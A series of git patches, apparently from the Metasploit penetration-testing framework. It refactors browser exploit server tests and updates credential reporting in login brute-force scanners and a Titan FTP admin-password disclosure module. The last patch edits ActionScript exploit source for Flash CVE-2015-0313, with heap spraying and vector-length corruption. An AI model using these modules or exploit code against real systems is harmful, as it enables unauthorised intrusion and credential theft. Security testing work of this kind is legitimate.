+    note = double('note')
+    allow(note).to receive(:ntype).and_return(tag)
+    allow(note).to receive(:data).and_return(data)
+
+    note
+  end
+
+
+  before(:each) do
+    allow_any_instance_of(described_class).to receive(:vprint_status)
+    @notes = [create_fake_note(first_profile_tag, first_packed_profile)]
+  end
+
   subject(:server) do
     mod = Msf::Exploit::Remote.allocate
     mod.extend described_class
-    mod.send(:initialize, {})
+    mod.send(:initialize)
+    mod.send(:datastore=, {'NoteTypePrefix' => default_note_type_prefix})
     mod
   end
 
   let(:service_double) do
     service = double('service')
-    service.stub(:server_name=)
-    service.stub(:add_resource)
+    allow(service).to receive(:server_name=)
+    allow(service).to receive(:add_resource)
     service
   end
 
-  let(:expected_user_agent) do
-    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
-  end
-
-  let(:profile_name) do
-    'random'
-  end
-
-  let(:expected_os_name) do
-    'linux'
-  end
-
   let(:exploit_page) do
     server.instance_variable_get(:@exploit_receiver_page)
   end
 
-  let(:expected_profile) do
-    {
-      :source   =>'script',
-      :os_name  =>'Windows XP',
-      :ua_name  =>'MSIE',
-      :ua_ver   =>'8.0',
-      :arch     =>'x86',
-      :office   =>'null',
-      :activex  => [ {clsid: '{D27CDB6E-AE6D-11cf-96B8-444553540000}', method: 'LoadMovie'} ],
-      :proxy    => false,
-      :language => 'en-us',
-      :tried    => true
-    }
-  end
-
   before do
     Rex::ServiceManager.stub(:start => service_double)
   end
@@ -58,7 +89,8 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   it_should_behave_like 'Msf::Exploit::JSObfu'
 
-  describe "#get_module_resource" do
+
+  describe '#get_module_resource' do
     it "should give me a URI to access the exploit page" do
       module_resource = server.get_module_resource
       expect(module_resource).to include(exploit_page)
@@ -67,127 +99,68 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   describe '#has_bad_activex?' do
     context 'when there is a bad activex' do
-      let(:js_ax_value) { "#{expected_profile[:activex][0][:clsid]}=>#{expected_profile[:activex][0][:method]}=>false" }
+      let(:js_ax_value) { "#{first_profile_info['activex'][0][:clsid]}=>#{first_profile_info['activex'][0][:method]}=>false" }
       it 'returns false' do
         expect(server.has_bad_activex?(js_ax_value)).to be_truthy
       end
     end
 
     context 'when there is no bad activex' do
-      let(:js_ax_value) { "#{expected_profile[:activex][0][:clsid]}=>#{expected_profile[:activex][0][:method]}=>true" }
+      let(:js_ax_value) { "#{first_profile_info['activex'][0][:clsid]}=>#{first_profile_info['activex'][0][:method]}=>true" }
       it 'returns true' do
         expect(server.has_bad_activex?(js_ax_value)).to be_falsey
       end
     end
   end
 
-  describe "#get_bad_requirements" do
-    let(:rejected_requirements) do
-      server.get_bad_requirements(fake_profile)
+  describe '#get_bad_requirements' do
+    let(:this_profile) do
+      MessagePack.unpack(first_packed_profile)
     end
 
-    context 'when given the expected profile' do
-      it "should not contain any bad requirements" do
-        expect(server.get_bad_requirements(expected_profile)).to eq([])
+    let(:requirements) { {} }
+
+    before(:each) do
+      r = server.instance_variable_get(:@requirements)
+      requirements.each_pair do |key, value|
+        r[key] = value
+      end
+
+      server.instance_variable_set(:@requirements, r)
+    end
+
+    context 'when all requirements are met' do
+      let(:requirements) { first_profile_info }
+      it 'returns an empty bad requirement array' do
+        expect(server.get_bad_requirements(this_profile)).to be_empty
       end
     end
 
-    context 'when attempting to match :os_name' do
-      let(:fake_profile) do
-        { :os_name => expected_os_name }
-      end
-
-      before do
-        server.instance_variable_set(:@requirements, {:os_name => /win/i})
-      end
-
-      it "identifies :os_name as a requirement not met" do
-        expect(rejected_requirements).to eq([:os_name])
+    context 'when the os_name requirement is not met' do
+      let(:requirements) { {'os_name'=>'Linux'} }
+      it 'returns os_name in the array as a bad requirement' do
+        expect(server.get_bad_requirements(this_profile)).to eq(['os_name'])
       end
     end
 
-    context 'when attempting to match :ua_ver' do
-      context 'against version 25.0' do
-        let(:expected_ua_ver) { '25.0' }
-        let(:fake_profile) do
-          { :ua_ver => expected_ua_ver }
-        end
-
-        before do
-          server.instance_variable_set(:@requirements, {:ua_ver => ua_ver})
-        end
-
-        context "with the regex /26\.0$/" do
-          let(:ua_ver) { /26\.0$/ }
-          it "should reject :ua_ver" do
-            expect(rejected_requirements).to include(:ua_ver)
-          end
-        end
-
-        context "with the regex /25\.0$/" do
-          let(:ua_ver) { /25\.0$/ }
-          it "should accept :ua_ver" do
-            expect(rejected_requirements).not_to include(:ua_ver)
-          end
-        end
-
-        context "with a Proc that checks if version is between 1-5" do
-          let(:ua_ver) { lambda{ |ver| ver.to_i.between?(1, 5) } }
-          it "should reject :ua_ver" do
-            expect(rejected_requirements).to include(:ua_ver)
-          end
-        end
-
-        context "with a Proc that checks if version is between 20-26" do
-          let(:ua_ver) { lambda{ |ver| ver.to_i.between?(20, 26) } }
-          it "should accept :ua_ver" do
-            expect(rejected_requirements).not_to include(:ua_ver)
-          end
-        end
+    context 'when a Linux regex cannot match a Winodws os_name' do
+      let(:requirements) { {'os_name'=>/Linux/} }
+      it 'returns os_name in the array as a bad requirement' do
+        expect(server.get_bad_requirements(this_profile)).to eq(['os_name'])
       end
     end
   end
 
-  describe "#init_profile" do
-    it "should initialize an empety profile for tag 'random'" do
-      server.init_profile(profile_name)
-      ivar_target_profile = server.instance_variable_get(:@target_profiles)
-      expect(ivar_target_profile).to eq({profile_name=>{}})
-    end
-  end
-
-  describe "#get_profile" do
-    it "should return nil when a profile isn't found" do
-      server.init_profile(profile_name)
-      p = server.get_profile("non_existent_profile")
-      expect(p).to be_nil
-    end
-
-    it "returns a profile if found" do
-      server.init_profile(profile_name)
-      p = server.get_profile(profile_name)
-      expect(p).to eq({})
-    end
-  end
-
-  describe "#update_profile" do
-    it "updates my target profile's :os_name information" do
-      server.init_profile(profile_name)
-      profile = server.get_profile(profile_name)
-      server.update_profile(profile, :os_name, expected_os_name)
-      profile = server.get_profile(profile_name)
-      expect(profile[:os_name]).to eq(expected_os_name)
-    end
-  end
-
-  describe "#get_detection_html" do
+  describe '#get_detection_html' do
     it "returns the detection code that the client will get" do
+      expected_user_agent = 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
       html = server.get_detection_html(expected_user_agent)
       expect(html).not_to eq('')
     end
   end
 
-  describe "#on_request_exploit" do
+
+  describe '#on_request_exploit' do
     it "raises a NoMethodError if called" do
       fake_cli = nil
       fake_request = nil
@@ -198,130 +171,148 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     end
   end
 
-  describe "#get_target" do
+  describe '#get_target' do
     it "returns a target" do
-      #
-      # Using Object for Msf::Module::Target
-      #
-      expected_object = Object
+      expected_object = double('Msf::Module::Target')
       server.instance_variable_set(:@target, expected_object)
       server.get_target.should eq(expected_object)
     end
   end
 
-  describe "#try_set_target" do
-    it "Sets a target based on requirements" do
-      #
-      # This testcase needs to be better somehow, but not sure how to actually create
-      # a Msf::Module::Target. All we're able to test here is making sure the method
-      # doesn't raise anything by exercising the code.
-      #
-      server.instance_variable_set(:@requirements, {:os_name => /win/i})
-      server.instance_variable_set(:@target, Object)
-      server.try_set_target(expected_profile)
-      server.get_target.should eq(Object)
+  describe '#try_set_target' do
+    let(:fake_targets) do
+      target = double('Msf::Module::Target')
+      allow(target).to receive(:opts) { first_profile_info }
+      [target]
+    end
+
+    before(:each) do
+      allow_any_instance_of(described_class).to receive(:targets) { fake_targets }
+    end
+
+    context 'when requirements match a target' do
+      it 'sets @target' do
+        expect(server.get_target).to be_nil
+        server.try_set_target(MessagePack.unpack(first_packed_profile))
+        expect(server.get_target).to eq(fake_targets.first)
+      end
     end
   end
 
-  describe "#extract_requirements" do
-    it "finds all the recognizable keys" do
-      requirements = {:os_name=>"Windows XP", :ua_name=>"MSIE", :ua_ver=>"8.0"}
-      matches = server.extract_requirements(requirements)
-      expect(matches).to eq(requirements)
+  describe 'extract_requirements' do
+    context 'when a recognizable requirement is given' do
+      it 'returns a hash that contains the recognizable requirement' do
+        expected_hash = {'os_name'=>'Linux'}
+        expect(server.extract_requirements(expected_hash)).to eq(expected_hash)
+      end
     end
 
-    it "makes sure the keys are always symbols" do
-      requirements = {'os_name'=>"Windows XP", 'ua_name'=>"MSIE"}
-      matches = server.extract_requirements(requirements)
-      matches.each do |k,v|
-        expect(k.class).to eq(Symbol)
+    context 'when a unrecognizable requirement is given' do
+      it 'returns a hash that does not have the unrecognizable requirement' do
+        bad_hash = {'UNKNOWN_KEY'=>'VALUE'}
+        expect(server.extract_requirements(bad_hash)).to be_empty
+      end
+    end
+  end
+
+  describe '#retrieve_tag' do
+    context 'when the browser has a cookie that contains our tag' do
+      let(:tag) do
+        'tag'
+      end
+
+      let(:cookie) do
+        "__ua=#{tag};"
+      end
+
+      let(:cli_request) do
+        req = Rex::Proto::Http::Request.new
+        req.headers['Cookie'] = cookie
+        req
+      end
+
+      it 'returns the tag from the cookie' do
+        expect(server.retrieve_tag(cli, cli_request)).to eq(tag)
+      end
+    end
+
+    context 'when the browser does not have a tag' do
+
+      let(:cli_request) do
+        Rex::Proto::Http::Request.new
+      end
+
+      it 'returns a new one in MD5' do
+        expect(server.retrieve_tag(cli, cli_request)).to match(/^[0-9a-f]{32}$/)
       end
     end
   end
 
   describe '#on_request_uri' do
-    let(:cli)     { double(:peerhost => '0.0.0.0') }
-    let(:cookie)  { '' }
-    let(:headers) { {'Cookie' => cookie, 'User-Agent' => ''} }
-    let(:body)    { '' }
-    let(:cookie_name) { Msf::Exploit::Remote::BrowserExploitServer::DEFAULT_COOKIE_NAME }
-    let(:request) do
-      double(:body => body, :headers => headers, :uri => server.get_resource )
+    before(:each) do
+      allow(server).to receive(:get_profile_info) { MessagePack.unpack(first_packed_profile) }
+      allow(server).to receive(:init_profile).with(kind_of(String))
+      allow(server).to receive(:update_profile)
+      allow(server).to receive(:process_browser_info)
+      allow(server).to receive(:send_response)      { @send_response_called = true }
+      allow(server).to receive(:send_redirect)      { @send_redirect_called = true }
+      allow(server).to receive(:send_not_found)     { @send_not_found_called = true}
+      allow(server).to receive(:on_request_exploit) { @on_request_exploit_called = true }
+      allow(server).to receive(:on_request_exploit) { @on_request_exploit_called = true }
     end
 
-    before do
-      server.stub(:send_redirect)
-      server.stub(:send_response)
-      server.stub(:send_not_found)
+    after(:each) do
+      @send_response_called      = false
+      @send_redirect_called      = false
+      @on_request_exploit_called = false
+      @send_not_found_called     = false
+      @on_request_exploit_called = false
     end
 
-    context 'when a new visitor requests the exploit' do
-      before { JSObfu.disabled = true }
-      after  { JSObfu.disabled = false }
-
-      it 'calls send_response once' do
-        server.should_receive(:send_response).once
-        server.on_request_uri(cli, request)
-      end
-
-      it 'serves the os.js detection script' do
-        server.should_receive(:send_response) do |cli, html, headers|
-          expect(html).to include('os_detect')
-        end
-        server.on_request_uri(cli, request)
+    context 'when / is requested' do
+      it 'sends the information gathering page' do
+        cli_request = Rex::Proto::Http::Request.new 
+        server.on_request_uri(cli, cli_request)
+        expect(@send_redirect_called).to be_truthy
       end
     end
 
-    context 'when a returning visitor requests the exploit' do
-      let(:body) { '' }
-      let(:tag) { 'joe' }
-      let(:cookie) { "#{cookie_name}=#{tag}" }
-
-      before { server.init_profile(tag) }
-
-      it 'calls send_redirect once' do
-        server.should_receive(:send_redirect).once
-        server.on_request_uri(cli, request)
-      end
-
-      it 'redirects to the exploit URL' do
-        server.should_receive(:send_redirect) do |cli, url|
-          expect(url).to end_with("#{exploit_page}/")
-        end
-        server.on_request_uri(cli, request)
+    context 'when info_receiver_page is requested' do
+      it 'sends an empty page' do
+        info_receiver_page_var = server.instance_variable_get(:@info_receiver_page)
+        cli_request = Rex::Proto::Http::Request.new
+        cli_request.uri = info_receiver_page_var
+        server.on_request_uri(cli, cli_request)
+        expect(@send_response_called).to be_truthy
       end
     end
 
-    context 'when a returning visitor from a previous msf run requests the exploit' do
-      let(:body) { '' }
-      let(:tag) { 'joe' }
-      let(:cookie) { "#{cookie_name}=#{tag}" }
-
-      before { JSObfu.disabled = true }
-      after  { JSObfu.disabled = false }
-
-      it 'calls send_response once' do
-        server.should_receive(:send_response).once
-        server.on_request_uri(cli, request)
-      end
-
-      it 'serves the os.js detection script' do
-        server.should_receive(:send_response) do |cli, html, headers|
-          expect(html).to include('os_detect')
-        end
-        server.on_request_uri(cli, request)
+    context 'when noscript_receiver_page is requested' do
+      it 'sends a not-found' do
+        noscript_receiver_page_var = server.instance_variable_get(:@noscript_receiver_page)
+        cli_request = Rex::Proto::Http::Request.new
+        cli_request.uri = noscript_receiver_page_var
+        server.on_request_uri(cli, cli_request)
+        expect(@send_not_found_called).to be_truthy
       end
     end
 
+    context 'when exploit_receiver_page is requested' do
+      it 'calls on_request_exploit' do
+        exploit_receiver_page_var = server.instance_variable_get(:@exploit_receiver_page)
+        cli_request = Rex::Proto::Http::Request.new
+        cli_request.uri = exploit_receiver_page_var
+        server.on_request_uri(cli, cli_request)
+        expect(@on_request_exploit_called).to be_truthy
+      end
+    end
+  end
 
   describe '#get_payload' do
-    let(:cli) {
-      Rex::Socket::Tcp
-    }
-
     before(:each) do
-      allow(cli).to receive(:peerhost).and_return('0.0.0.0')
-      allow(cli).to receive(:peerport).and_return(4444)
+      target = double('Msf::Module::Target')
+      allow(target).to receive(:arch).and_return(nil)
+      allow(server).to receive(:get_target).and_return(target)
     end
 
     let(:encoded) { '@EXE@' }
@@ -330,25 +321,15 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
       double(:encoded => encoded, :arch => ['x86'])
     }
 
-    let(:x86_64_payload) {
-      double(:encoded => encoded, :arch => ['x86_64'])
+    let(:normalized_profile_info) {
+      first_profile_info.inject({}){|data,(k,v)| data[k.to_sym] = v; data}
     }
 
     context 'when the payload supports the visitor\'s browser architecture' do
       it 'returns a payload' do
         allow(server).to receive(:regenerate_payload).and_return(x86_payload)
-        expect(server.get_payload(cli, expected_profile)).to eq(encoded)
-      end
-    end
-
-    context 'when the payload does not support the visitor\'s browser architecture'  do
-      it 'raises a BESException' do
-        allow(server).to receive(:regenerate_payload).and_return(x86_64_payload)
-        expect{server.get_payload(cli, expected_profile)}.to raise_error(Msf::Exploit::Remote::BrowserExploitServer::BESException)
+        expect(server.get_payload(cli, normalized_profile_info)).to eq(encoded)
       end
     end
   end
-
-  end
-
 end

From 1b3f911f849afd5cec1dfbd641494abbad392876 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Wed, 10 Jun 2015 09:54:10 +0500
Subject: [PATCH 0374/1013] Change credential status from untried to successful

---
 .../scanner/pcanywhere/pcanywhere_login.rb    | 36 +++++++++----------
 1 file changed, 18 insertions(+), 18 deletions(-)

diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb
index c750621790..588236bf8f 100644
--- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb
+++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb
@@ -39,11 +39,11 @@ class Metasploit3 < Msf::Auxiliary
 
     each_user_pass do |user, pass|
       next if user.blank? or pass.blank?
-      print_status "Trying #{user}:#{pass}"
+      print_status("Trying #{user}:#{pass}")
       result = do_login(user, pass)
       case result
       when :success
-        print_good "#{ip}:#{rport} Login Successful #{user}:#{pass}"
+        print_good("#{ip}:#{rport} Login Successful #{user}:#{pass}")
         report_cred(
           ip: rhost,
           port: datastore['RPORT'],
@@ -52,16 +52,16 @@ class Metasploit3 < Msf::Auxiliary
           password: pass,
         )
         return if datastore['STOP_ON_SUCCESS']
-        print_status "Waiting to Re-Negotiate Connection (this may take a minute)..."
+        print_status('Waiting to Re-Negotiate Connection (this may take a minute)...')
         select(nil, nil, nil, 40)
         connect
         hsr = pca_handshake(ip)
         return if hsr == :handshake_failed
       when :fail
-        print_status "#{ip}:#{rport} Login Failure #{user}:#{pass}"
+        print_status("#{ip}:#{rport} Login Failure #{user}:#{pass}")
       when :reset
-        print_status "#{ip}:#{rport} Login Failure #{user}:#{pass}"
-        print_status "Connection Reset Attempting to reconnect in 1 second"
+        print_status("#{ip}:#{rport} Login Failure #{user}:#{pass}")
+        print_status('Connection reset attempting to reconnect in 1 second')
         select(nil, nil, nil, 1)
         connect
         hsr = pca_handshake(ip)
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::UNTRIED,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
     }.merge(service_data)
 
     create_credential_login(login_data)
@@ -110,18 +110,18 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     # Check if we are now at the password prompt
-    unless res and res.include? "Enter password"
-      print_error "Problem Sending Login: #{res.inspect}"
+    unless res and res.include? 'Enter password'
+      print_error("Problem Sending Login: #{res.inspect}")
       return :abort
     end
 
     epass = encryption_header(encrypt(pass))
     nsock.put(epass)
     res = nsock.get_once(-1,20)
-    if res.include? "Login unsuccessful"
+    if res.include? 'Login unsuccessful'
       disconnect()
       return :reset
-    elsif res.include? "Invalid login"
+    elsif res.include? 'Invalid login'
       return :fail
     else
       disconnect()
@@ -130,38 +130,38 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def pca_handshake(ip, nsock=self.sock)
-    print_status "Handshaking with the pcAnywhere service"
+    print_status('Handshaking with the pcAnywhere service')
     nsock.put("\x00\x00\x00\x00")
     res = nsock.get_once(-1,5)
-    unless res and res.include? "Please press <Enter>"
-      print_error "Handshake(1) failed on Host #{ip} aborting. (Error: #{res.inspect} )"
+    unless res and res.include? 'Please press <Enter>'
+      print_error("Handshake(1) failed on Host #{ip} aborting. Error: #{res.inspect}")
       return :handshake_failed
     end
 
     nsock.put("\x6F\x06\xff")
     res = nsock.get_once(-1,5)
     unless res and res.include? "\x78\x02\x1b\x61"
-      print_error "Handshake(2) failed on Host #{ip} aborting. (Error: #{res.inspect} )"
+      print_error("Handshake(2) failed on Host #{ip} aborting. Error: #{res.inspect}")
       return :handshake_failed
     end
 
     nsock.put("\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00")
     res = nsock.get_once(-1,5)
     unless res and res == "\x1b\x62\x00\x02\x00\x00\x00"
-      print_error "Handshake(3) failed on Host #{ip} aborting. (Error: #{res.inspect} )"
+      print_error("Handshake(3) failed on Host #{ip} aborting. Error: #{res.inspect}")
       return :handshake_failed
     end
 
     nsock.put("\x6f\x62\x01\x02\x00\x00\x00")
     res = nsock.get_once(-1,5)
     unless res and res.include? "\x00\x7D\x08"
-      print_error "Handshake(4) failed on Host #{ip} aborting. (Error: #{res.inspect} )"
+      print_error("Handshake(4) failed on Host #{ip} aborting. Error: #{res.inspect}")
       return :handshake_failed
     end
 
     res = nsock.get_once(-1,5) unless pca_at_login?(res)
     unless pca_at_login?(res)
-      print_error "Handshake(5) failed on Host #{ip} aborting. (Error: #{res.inspect} )"
+      print_error("Handshake(5) failed on Host #{ip} aborting. Error: #{res.inspect}")
       return :handshake_failed
     end
   end

From 78a6e1bc9091f330be3ba0de153e26693636c55b Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Wed, 10 Jun 2015 10:07:33 +0500
Subject: [PATCH 0375/1013] Change credential status from untried to successful

---
 modules/auxiliary/scanner/http/owa_login.rb | 21 +--------------------
 1 file changed, 1 insertion(+), 20 deletions(-)

diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb
index 299f1266bb..60970856b3 100644
--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -206,15 +206,6 @@ class Metasploit3 < Msf::Auxiliary
       # Check if the password needs to be changed.
       if res.headers['location'] =~ /expiredpassword/
         print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}': NOTE password change required")
-        report_hash = {
-          :host   => datastore['RHOST'],
-          :port   => datastore['RPORT'],
-          :sname  => 'owa',
-          :user   => user,
-          :pass   => pass,
-          :active => true,
-          :type => 'password'}
-
         report_cred(
           ip: datastore['RHOST'],
           port: datastore['RPORT'],
@@ -276,16 +267,6 @@ class Metasploit3 < Msf::Auxiliary
 
     if res.body =~ login_check
       print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}'")
-
-      report_hash = {
-        :host   => datastore['RHOST'],
-        :port   => datastore['RPORT'],
-        :sname  => 'owa',
-        :user   => user,
-        :pass   => pass,
-        :active => true,
-        :type => 'password'}
-
       report_cred(
         ip: datastore['RHOST'],
         port: datastore['RPORT'],
@@ -360,7 +341,7 @@ class Metasploit3 < Msf::Auxiliary
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::UNTRIED,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
     }.merge(service_data)
 
     create_credential_login(login_data)

From 3fe6ddd10a00cb9cb565d1f32a14feadc8fec94b Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Wed, 10 Jun 2015 10:09:57 +0500
Subject: [PATCH 0376/1013] Change credential status from untried to successful

---
 .../scanner/nessus/nessus_xmlrpc_login.rb        | 16 +++-------------
 1 file changed, 3 insertions(+), 13 deletions(-)

diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb
index 149782f31e..cab0349b09 100644
--- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb
+++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb
@@ -99,17 +99,7 @@ class Metasploit3 < Msf::Auxiliary
 
     if res.code == 200
       if res.body =~ /<status>OK<\/status>/
-        print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
-
-        report_hash = {
-          :host   => datastore['RHOST'],
-          :port   => datastore['RPORT'],
-          :sname  => 'nessus-xmlrpc',
-          :user   => user,
-          :pass   => pass,
-          :active => true,
-          :type => 'password'}
-
+        print_good("SUCCESSFUL LOGIN. '#{user}':'#{pass}'")
         report_cred(
           ip: datastore['RHOST'],
           port: datastore['RPORT'],
@@ -120,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
         return :next_user
       end
     end
-    vprint_error("FAILED LOGIN. '#{user}' : '#{pass}'")
+    vprint_error("FAILED LOGIN. '#{user}':'#{pass}'")
     return :skip_pass
   end
 
@@ -143,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::UNTRIED,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
     }.merge(service_data)
 
     create_credential_login(login_data)

From 3ffe006e09a44a48a23b1eadb5e9f527928e5897 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Wed, 10 Jun 2015 13:36:26 +0500
Subject: [PATCH 0377/1013] Update titan_ftp_admin_pwd to use the new creds API

---
 .../scanner/http/titan_ftp_admin_pwd.rb       | 46 ++++++++++++++-----
 1 file changed, 35 insertions(+), 11 deletions(-)

diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
index 70d9888b49..c9eccf1324 100644
--- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
+++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'CVE', '2013-1625' ],
+          [ 'CVE', '2013-1625' ]
         ]
     )
 
@@ -44,14 +44,14 @@ class Metasploit3 < Msf::Auxiliary
   def run_host(ip)
     res = send_request_cgi(
       {
-        'uri'       => "/admin.dll",
+        'uri'       => '/admin.dll',
         'method'    => 'POST',
         'headers'   => {
           'SRT-WantXMLResponses' => 'true',
           'SRT-XMLRequest'       => 'true',
           'Authorization'        => 'Basic FAKEFAKE'
         },
-        'data'      => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
+        'data'      => '<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>'
       })
     return if not res
 
@@ -89,15 +89,39 @@ class Metasploit3 < Msf::Auxiliary
         print_good("#{ip}:#{datastore['RPORT']} - Base Directory: #{info[:basedir]}")
       end
       print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: '#{info[:username]}:#{info[:password]}'")
-      report_auth_info(
-        :host       => ip,
-        :port       => datastore['RPORT'],
-        :user       => info[:username],
-        :pass       => info[:password],
-        :ptype      => "password",
-        :proto      => "http",
-        :sname      => "Titan FTP Admin Console"
+      report_cred(
+        ip: ip,
+        port: datastore['RPORT'],
+        user: info[:username],
+        password: info[:password],
+        service_name: 'ftp'
       )
     end
   end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
 end

From 7cb82f594b1e1fbb431bda673bfd061b744f130c Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Wed, 10 Jun 2015 14:24:05 +0500
Subject: [PATCH 0378/1013] Add ftp port for service

---
 modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
index c9eccf1324..e4152f00a1 100644
--- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
+++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
       print_good("#{ip}:#{datastore['RPORT']} - Admin Credentials: '#{info[:username]}:#{info[:password]}'")
       report_cred(
         ip: ip,
-        port: datastore['RPORT'],
+        port: 21,
         user: info[:username],
         password: info[:password],
         service_name: 'ftp'

From d95a0f432deb7df80becea792ddbc3b7a323be4b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 09:12:25 -0500
Subject: [PATCH 0379/1013] Update AS codE

---
 .../source/exploits/CVE-2015-0313/Main.as     | 178 ++++--------------
 1 file changed, 38 insertions(+), 140 deletions(-)

diff --git a/external/source/exploits/CVE-2015-0313/Main.as b/external/source/exploits/CVE-2015-0313/Main.as
index b25008234d..6c978e8d90 100755
--- a/external/source/exploits/CVE-2015-0313/Main.as
+++ b/external/source/exploits/CVE-2015-0313/Main.as
@@ -23,8 +23,8 @@ import mx.utils.Base64Decoder
 
 public class Main extends Sprite
 {
-    private var ov:Vector.<Object> = new Vector.<Object>(25600)
-    private var uv:Vector.<uint> = new Vector.<uint>
+    private var ov:Vector.<Object> = new Vector.<Object>(80000)
+    private var uv:Vector.<uint>
     private var ba:ByteArray = new ByteArray()
     private var worker:Worker
     private var mc:MessageChannel
@@ -39,26 +39,28 @@ public class Main extends Sprite
 
     private function mainThread():void
     {
-        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-        var pattern:RegExp = / /g;
-        b64_payload = b64_payload.replace(pattern, "+")
-        b64.decode(b64_payload)
-        payload = b64.toByteArray().toString()
+      //  var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+    //    var pattern:RegExp = / /g;
+  //      b64_payload = b64_payload.replace(pattern, "+")
+//        b64.decode(b64_payload)
+//        payload = b64.toByteArray().toString()
 
         ba.length = 0x1000
         ba.shareable = true
         for (var i:uint = 0; i < ov.length; i++) {
-            ov[i] = new Vector.<Object>(1014)
-            ov[i][0] = ba
-            ov[i][1] = this
+            ov[i] = new Vector.<uint>(1014)
+            ov[i][0] = 0xdeedbeef
         }
-        for (i = 0; i < ov.length; i += 2) delete(ov[i])
+        for (i = 0; i < ov.length / 2; i += 2) {
+			delete(ov[i])
+		}
         worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
         mc = worker.createMessageChannel(Worker.current)
         mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
         worker.setSharedProperty("mc", mc)
         worker.setSharedProperty("ba", ba)
         ApplicationDomain.currentDomain.domainMemory = ba
+		Logger.log("starting...")
         worker.start()
     }
 
@@ -70,141 +72,37 @@ public class Main extends Sprite
         ov[0] = new Vector.<uint>(1022)
         mc.send("")
         while (mc.messageAvailable);
-        ov[0][0] = ov[0][0x403] - 0x18 - 0x1000
-        ba.length = 0x500000
-        var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) + 0x100000
-        var main:uint = ov[0][0x409] - 1
-        var vtable:uint = vector_read(main)
-        vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8)
-        vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff)
-        mc.send(ov[0][0].toString() + "/" + buffer.toString() + "/" + main.toString() + "/" + vtable.toString())
+        for (var i:uint = 0; i < 20000; i++) {
+        	if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
+				ov[0][i] = 0xffffffff
+				break
+        	}
+        }
+		ov[0][0xfffffffe] = 1014
+        mc.send("")
     }
 
